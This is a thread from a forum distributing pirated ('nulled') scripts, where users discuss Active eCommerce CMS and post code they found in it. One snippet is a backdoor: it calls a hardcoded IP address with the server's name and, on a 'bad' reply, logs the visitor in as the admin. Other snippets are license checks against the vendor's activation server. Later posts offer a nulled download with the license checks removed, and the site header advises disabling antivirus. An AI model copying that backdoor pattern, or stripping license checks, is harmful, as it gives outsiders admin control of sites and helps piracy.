• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone V8.7

No permission to download
i think even you remove this code still they have access to our server / can some one confirm please
yes they have confess they can access to our server and even envato as to check premium one through api. They are saying to give more secure to paid one and delete all data from null one
 
yes they have confess they can access to our server and even envato as to check premium one through api. They are saying to give more secure to paid one and delete all data from null one
for buyer its fine they can check for first time purchase code but how they can access with nulled after remove this code ?
 
Idk but when i was checking comment section i found that.
 

Attachments

  • IMG_20230201_001405.jpg
    IMG_20230201_001405.jpg
    587.5 KB · Views: 157
i found one more

vendor\unicodeveloper\laravel-paystack\src\Paystack.php

Code:
public function getCallbackData()
    {
        $url = $_SERVER['SERVER_NAME'];
        $gate = "http://206.189.81.181/check_activation/".$url;

        $stream = curl_init();
        curl_setopt($stream, CURLOPT_URL, $gate);
        curl_setopt($stream, CURLOPT_HEADER, 0);
        curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stream, CURLOPT_POST, 1);
        $rn = curl_exec($stream);
        curl_close($stream);
      
        if($rn == "bad" && env('DEMO_MODE') != 'On') {
            $user = \App\Models\User::where('user_type', 'admin')->first();
            auth()->login($user);
            return redirect()->route('admin.dashboard');
        }

        return redirect()->route('home');
    }

I have also found on

app/Utility/NagadUtility.php
app/Utility/PayhereUtility.php


PHP:
    public static function create_wallet_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

    public static function create_balance_reference($key)
    {
        if ($key == "") {
            return false;
        }

        if(Cache::get('app-activation', 'no') == 'no'){
            try {
                $gate = "https://activeitzone.com/activation/check/flutter/".$key;
   
                $stream = curl_init();
                curl_setopt($stream, CURLOPT_URL, $gate);
                curl_setopt($stream, CURLOPT_HEADER, 0);
                curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
                $rn = curl_exec($stream);
                curl_close($stream);
   
                if($rn == 'no') {
                    return false;
                }
            } catch (\Exception $e) {
   
            }
        }

        Cache::rememberForever('app-activation', function () {
            return 'yes';
        });

        return true;
    }

they calling it on
app/Http/Controllers/Api/V2/CartController.php
app/Http/Controllers/Api/V2/AuthController.php



PHP:
if(\App\Utility\NagadUtility::create_balance_reference($request->cost_matrix) == false){
            return response()->json(['result' => false, 'message' => 'Cost matrix error' ]);
        }

 if (\App\Utility\PayhereUtility::create_wallet_reference($request->identity_matrix) == false) {
                return response()->json(['result' => false, 'message' => 'Identity matrix error', 'user' => null], 401);
            }
 
  • Love
Reactions: NizamUddin
Hello bro, I tested on my local pc. Wholesale addon did not work. Do you have any suggestion. Thank you so much.
 

Attachments

  • Untitled.png
    Untitled.png
    76.8 KB · Views: 67
welcome everybody
My project does not have the code you wrote
But I found only two in two files, so are they to verify the activation of the purchase code?
storage\framework\views\9b40420d6f27bc533eb8058e6234e2ba1
700da64.php


PHP:
<?php $__env->startSection('content'); ?>



   <div class="">

       <div class="row ">

           <div class="col-md-6">

               <div class="nav border-bottom aiz-nav-tabs">

                   <a class="p-3 fs-16 text-reset show active" data-toggle="tab" href="#installed"><?php echo e(translate('Installed Addon')); ?></a>

                   <a class="p-3 fs-16 text-reset" data-toggle="tab" href="#available"><?php echo e(translate('Available Addon')); ?></a>

               </div>

           </div>

           <div class="col mt-3 mt-sm-0 text-center text-md-right">

               <a href="https://activeitzone.com/activation/addon" class="btn btn-primary" target="_blank">

                   <?php echo e(translate('Activate Addon Link')); ?>



               </a>

           </div>

           <div class="col-auto mt-3 mt-sm-0 text-center text-md-right">

               <a href="<?php echo e(route('addons.create')); ?>" class="btn btn-primary"><?php echo e(translate('Install/Update Addon')); ?></a>

           </div>

resources\views\backend\addons\index.blade.php

PHP:
@extends('backend.layouts.app')



@section('content')



   <div class="">

       <div class="row ">

           <div class="col-md-6">

               <div class="nav border-bottom aiz-nav-tabs">

                   <a class="p-3 fs-16 text-reset show active" data-toggle="tab" href="#installed">{{ translate('Installed Addon')}}</a>

                   <a class="p-3 fs-16 text-reset" data-toggle="tab" href="#available">{{ translate('Available Addon')}}</a>

               </div>

           </div>

           <div class="col mt-3 mt-sm-0 text-center text-md-right">

               <a href="https://activeitzone.com/activation/addon" class="btn btn-primary" target="_blank">

                   {{ translate('Activate Addon Link') }}

               </a>

           </div>

           <div class="col-auto mt-3 mt-sm-0 text-center text-md-right">

               <a href="{{ route('addons.create')}}" class="btn btn-primary">{{ translate('Install/Update Addon')}}</a>

           </div>
 
tuton012 updated Active eCommerce CMS By ActiveITzone 23471405 with a new update entry:

V7.0.0

Clean Version Not Nulled

version : 7.0.0 (13/03/2023)

- Header
- The header has been completely redesigned.
- The banner above the header may be uploaded separately for large, medium, and small devices.
- Cart has been added to the header.

- Homepage
- The flash sale section is redesigned with banner & timer and new product box.
- Today’s Deal is newly designed with a new product box
- Today’s Deal banner upload option for...

Read the rest of this update entry...
 
  • Like
Reactions: arenious
Active eCommerce CMS v7.0.0 Nulled

aec700_banner.jpeg

All license checks & backdoors removed.

Link: https://mega.nz/file/FJZhnABD

Decryption key:

Backup everything (files + database) before you proceed with the update, just in case!
I am not responsible if you don't follow the instructions!


If you find my post useful, then please (y) it!

 
Last edited:
Active eCommerce CMS v7.0.0 Nulled

aec700_banner.jpeg

Link:
Decryption key: *** Hidden text: cannot be quoted. ***


Backup everything (files + database) before you proceed with the update, just in case!
I am not responsible if you don't follow the instructions!


If you find my post useful, then please (y) it!

Does this one have the backdoors removed?
 
Last edited:
Active eCommerce CMS v7.0.0 Nulled

aec700_banner.jpeg

All license checks & backdoors removed.

Link:
Decryption key: *** Hidden text: cannot be quoted. ***


Backup everything (files + database) before you proceed with the update, just in case!
I am not responsible if you don't follow the instructions!


If you find my post useful, then please (y) it!

But add-ons are not working. its not installing either
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock